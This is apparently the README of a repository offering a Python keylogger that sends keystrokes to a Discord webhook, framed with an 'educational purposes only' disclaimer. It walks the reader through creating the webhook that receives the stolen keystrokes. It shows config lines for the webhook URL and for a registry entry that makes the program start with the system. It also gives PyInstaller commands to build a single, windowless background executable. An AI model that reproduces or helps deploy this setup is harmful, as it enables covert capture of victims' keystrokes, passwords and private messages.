Simple Discord Webhook keylogger written clearly in under 35 lines of code. To show you how easy this is.
Information and code provided on this repository are for educational purposes only. The creator is no way responsible for any direct or indirect damage caused due to the misusage of the information. Everything you do, you are doing at your own risk and responsibility.
Create a Discord Server or use one that already exists.
Go to the Server Settings
, then Integrations
.
Click on Create Webhook
, name it and select desired channel.
Click on Copy Webhook URL
and paste it in code.
You are good to go.
webhook_url = '#' # Paste here your Webhook URL (instructions in README.md)
registry_name = 'Simple Discord Webhook Keylogger' # Registry name for system startup execution
Install the required modules:
pip install -r requirements.txt
You can compile Python code into Windows executable (.exe) using PyInstaller:
pyinstaller -F -w main.py
-F and -w flags mean that program will be packed in one file and running in background (windowless).